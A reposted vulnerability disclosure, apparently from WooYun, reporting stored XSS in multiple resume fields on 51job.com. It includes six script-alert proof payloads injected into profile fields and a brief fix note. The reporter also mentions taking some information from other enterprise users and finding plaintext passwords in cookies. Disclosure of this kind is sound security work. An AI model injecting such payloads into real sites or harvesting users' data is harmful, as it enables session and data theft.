来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 简要描述:51job.com个人简历多地方存储型XSS,导致可以获得企业用户访问的一些信息,因为申请企业用户需要验证,就没有测试。但是获取了别的企业用户的一点信息。详细说明:插入...
简要描述:51job.com个人简历多地方存储型XSS,导致可以获得企业用户访问的一些信息,因为申请企业用户需要验证,就没有测试。 但是获取了别的企业用户的一点信息。 详细说明:插入的。
漏洞证明: <td id="Cur_Val" valign="top"><script>alert("自我评价跨站")</script></td>
<td id="Cur_Val" colspan="2" valign="top"><script>alert("工作描述跨站")</script></td>
<td width="84%" id="Cur_Val" valign="top"><script>alert("项目描述跨站")</script></td>
<td id="Cur_Val" valign="top"><script>alert("责任描述跨站")</script></td>
<td id="Cur_Val" colspan="4" valign="top" height="30"><script>alert("专业描述跨站")</script></td>
<td width="86%" id="Cur_Val"><script>alert("内容跨站")</script></td> 完全木有过滤什么的。只要你插。
下面是偷的一点点东西。。
不确定为什么偷不到其他的信息。 前些天的cookie里面都有明文密码的。 现在没了。 修复方案:过滤,转义。
作者 Tea@乌云 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com